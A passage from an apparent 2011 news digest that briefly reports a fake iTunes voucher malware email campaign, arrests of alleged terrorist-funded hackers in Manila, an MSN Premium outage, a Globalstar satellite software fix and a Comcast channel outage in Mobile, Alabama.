34. November 24, The Register – (International) Thanksgiving menaced by virus-laden fake iTunes vouchers. E-mails containing supposed iTunes gift certificates doing the rounds in the run-up to Thanksgiving were actually loaded with malware, The Register reported November 24. Spoofed e-mails purportedly offering $50 vouchers for the iTunes Store, which arrive with e-mail subject lines such as “iTunes Gift Certificate,” come with an attachment supposedly containing a certificate code. In reality, these zip file attachments are infected with the Windows PC-compatible malware, detected by Sophos as BredoZp-B and first spotted by German info security group eleven-security. Source: http://www.theregister.co.uk/2011/11/24/fake_itunes_gift_cert_malware/

For more stories, see items 9 above in the Banking and Finance Sector 35 and 36 below in the Communications Sector

Communications Sector

35. November 25, Softpedia – (International) Terrorist-funded Filipino hackers arrested. U.S. and Philippine authorities managed to arrest four members of a hacker collective suspected to have been funded by terrorists and to have attempted a hack on AT&T, Softpedia reported November 25. The investigation that led to the arrest of the Filipinos started in March when the FBI requested the aid of Criminal Investigation and Detection Group’s Anti-Transnational and Cyber Crime Division (CIDG-ATCCD) concerning a hacking operation that targeted the wireless services provider AT&T. The suspects, aged between 21 and 31, and allegedly financed by a Saudi Arabian terrorist group, caused $2 million in damages, the Manila SunStar reported. The hackers were taken into custody after the FBI and the ATCCD raided several locations in the Metro Manila area, from where numerous computer and telecommunications equipments, believed to be used in the attacks, were seized. One of the hackers was arrested before in 2007 as a result of an operation by the FBI and Philippines authorities against terrorist organizations. The ATCCD chief claimed that back in 1999 when the FBI was investigating a series of hacking operations that targeted telecoms companies, they uncovered a trail of banking records that linked local hackers to terrorists. It turns out the criminal organizations from Pakistan and India are also somehow connected, since in 2007, a Pakistani man suspected of funding operations in India, also supplied the necessary funds for the Filipinos. Source: http://news.softpedia.com/news/Terrorist-Funded-Filipino-Hackers-Arrested-236560.shtml

36. November 24, CableMuse.com – (International) MSN Thanksgiving outage. Hundreds, potentially thousands of Microsoft MSN Premium customers experienced a major network outage the morning of November 24. Instead of the ability to log into MSN Premium, users received an error code (23) that stated difficulty with the sign in server. A MSN technical source reported at least 300 calls regarding the outage between 8:45 and 9:25 a.m. He stated that potentially thousands of customers were impacted, and that MSN was trying to locate the server(s) and correct the issues. The MSN technical representative also stated it was likely caused by too many people signing in at the same time. Service was restored to most if not all MSN Premium customers at about 11 a.m. November 24, more than 3 hours after the outage. Source: http://www.cablemuse.com/cmn188er23.html

37. November 24, Aviation Week – (International) Software fix could save Globalstar sat. Mobile satellite services provider Globalstar Inc. and European satellite manufacturer Thales Alenia Space announced an agreement that could return one of the Louisiana-based company’s second-generation telecom satellites to service, Aviation Week reported November 24. Over the coming months, Thales Alenia Space will develop and upload software to the satellite, which currently suffers from a mechanical glitch affecting two momentum wheels designed to keep the spacecraft in a stable position in orbit. Although the software fix is not expected to repair the wheels, it should adapt the satellite’s current in-flight configuration to allow it to return to service. The defective momentum wheels, built by North Carolina-based Goodrich Corp., affected two of the six satellites Globalstar launched in October 2010. If the new software fix works, a Thales spokesman said it could be uploaded to other satellites suffering momentum wheel defects in the future, if necessary. Globalstar is now looking at a different issue affecting momentum wheels on a second tranche of six second-generation satellites launched in July, and may delay the launch of a third batch of satellites currently planned for December. Source: http://www.aviationweek.com/aw/generic/story.jsp?id=news/asd/2011/11/23/12.xml&headline=Software

38. November 23, Mobile TV Examiner – (Alabama) Local Comcast customers lose APT IQ programming again. By the week of November 21, cable television customers of Comcast Cablevision of Mobile, Alabama, lost access to APT IQ programming from Alabama Public Television (APT) through their digital transport adapters or digital TV receivers (set-top boxes) provided by Comcast. The last time local customers of Comcast could not access APT IQ programming through cable TV was late August. Like the previous time, instead of APT IQ programming, TV sets connected to digital transport adapters displayed the words “We’ve detected an interruption in your service” and TV sets connected to digital TV receivers displayed the words “One moment please. This channel should be available shortly” with the reference code “S0a00.” While APT IQ programming was inaccessible through Comcast, WEIQ-TV continued to broadcast programming over the air on digital sub-channel 42-2, along with APT Create programming on digital sub-channel 42-3, and Alabama Public Television’s main programming on channel 42-1. Source: http://www.examiner.com/tv-in-mobile/local-comcast-customers-lose-apt-iq-programming-again

For another story see item 32 in the Information Technology Sector